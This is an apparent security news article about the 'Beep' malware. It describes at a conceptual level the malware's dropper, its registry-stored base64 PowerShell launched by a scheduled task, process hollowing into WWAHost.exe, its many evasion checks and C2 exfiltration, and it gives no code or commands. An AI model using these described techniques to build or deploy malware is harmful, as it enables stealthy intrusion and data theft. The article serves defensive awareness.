Cybersecurity researchers have uncovered a threatening software that is being tracked as 'Beep.' This malware has been designed with a wide range of features that make it highly resistant to detection and analysis by security software. Despite being in the development phase and lacking certain essential components, the Beep malware has the ability to permit threat actors to remotely download and execute additional payloads on devices that it has successfully compromised. Details about the threat were released in a report publicized by infosec experts.
This makes Beep a highly concerning threat for organizations and individuals, as it can potentially grant attackers unauthorized access to sensitive information and control over the affected devices. Individuals and organizations should keep their security software up-to-date and be vigilant for any signs of suspicious activity on their devices to prevent such malware attacks.
The Beep Malware can Pose a Significant Danger to Targeted Victims
Beep is designed to collect sensitive information from the compromised device. It is comprised of three main components: a dropper, an injector and the payload.
The dropper, also known as 'big.dll,' creates a new Registry key with a specific value called AphroniaHaimavati.' This value contains a PowerShell script that is encoded in the base64 format. The PowerShell script is launched by a scheduled task on the device every 13 minutes.
When the script runs, it downloads data and saves it to an injector called AphroniaHaimavati.dll. The injector is responsible for using various anti-debugging and anti-vm (virtualization) techniques to inject the payload into a legitimate system process called 'WWAHost.exe.' This is done through a process called process hollowing, which helps to evade detection from security tools running on the host.
The primary payload is responsible for collecting data from the compromised device and encrypting it. It then attempts to send the encrypted data to command and control (C2) server that was hardcoded. During analysis, the hardcoded C2 address was offline, but the malware continued to attempt connection, even after 120 failed tries.
The Beep Malware is Heavily Focused on Remaining Undetected
The Beep malware is known for its multiple evasion techniques implemented throughout its execution flow, making it difficult for detection and analysis by security software and infosec researchers. These techniques include string deobfuscation, system language check, debugger detection, anti-VM and anti-sandbox measures, among others. The malware's injector component also implements several additional anti-debugging and detection-evasion techniques. Beep's focus on evasion indicates that it may be an upcoming threat to watch out for, despite its limited operations in the wild at present.